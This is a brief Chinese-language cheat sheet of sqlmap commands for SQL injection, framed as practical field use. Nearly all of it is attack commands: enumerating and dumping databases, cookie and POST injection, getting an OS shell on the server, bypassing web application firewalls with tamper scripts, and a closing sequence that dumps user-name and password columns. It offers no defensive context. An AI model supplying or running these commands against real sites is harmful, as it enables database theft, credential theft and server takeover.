說明
本文主要講一下sqlmap在實戰中的一些技巧
注入檢測
檢測注入
sqlmap.py -u http://192.168.136.131/sqlmap/mysql/get_int.php?id=1 --batch
參數“–batch”指令來自動答複y或n。
批量檢測
sqlmap.py-m url.txt
常用注入方法
1.ACCESS資料庫注入:
sqlmap.py -u “url”
sqlmap.py -u “url” –tables
sqlmap.py -u “url” –columns -T “要拆的表名”
sqlmap.py -u “url” –dump -T “要拆的表名”-C “要拆的字段名”
2.MYSQL資料庫注入:
sqlmap.py -u “url”
sqlmap.py -u “url” –dbs
sqlmap.py -u “url” –current-db
sqlmap.py -u “url” –current-user
sqlmap.py -u “url” –tables -D “目前資料庫名”
sqlmap.py -u “url” –columns -T “要拆得的表名” -D “目前資料庫名”
sqlmap.py -u “url” –dump -C “字段名” -T “表名” -D “目前資料庫”
3.mssql資料庫:
同MYSQL
4.COOKIE注入:
sqlmap.py -u “www.xxx.com/asp或者www.xxx.com/php”?–cookie “參數名如id=1” –level 2
5.POST注入:
抓包儲存到SQLMAP目錄下.txt的檔案然後輸入指令sqlmap.py -r xxx.txt
sqlmap.py -u “url” –os-shell
7.注入HTTP請求 :
sqlmap.py -r xxx.txt –dbs
8.繞過WAF的tamper插件使用:
sqlmap.py -u “url” –tamper “xxx.py”
9.sqlmap自動填寫表單注入:
sqlmap.py -u URL –forms
sqlmap.py -u URL –forms –dbs
sqlmap.py -u URL –forms –current-db
sqlmap.py -u URL –forms -D 資料庫名稱–tables
sqlmap.py -u URL –forms -D 資料庫名稱 -T 表名 –columns
sqlmap.py -u URL –forms -D 資料庫名稱 -T 表名 -Cusername,password –dump
10.延時注入:
sqlmap –dbs -u “url” –delay 0.5
sqlmap –dbs -u “url” –safe-freq
實戰使用
列出全部資料庫
sqlmap -u ” http://127.0.0.1/web.php?id=1 ” --dbs
列出 web1庫的全部表
sqlmap -u ” http://127.0.0.1/web.php?id=1 ” -D web1 --tables
列出user表全部字段
sqlmap -u ” http://127.0.0.1/web.php?id=1 ” -D web1 -T user --columns
跑指定字段的資料
sqlmap -u ” http://127.0.0.1/web.php?id=1 ” -D web1 -T user -C ‘name,username,passwd’ --dump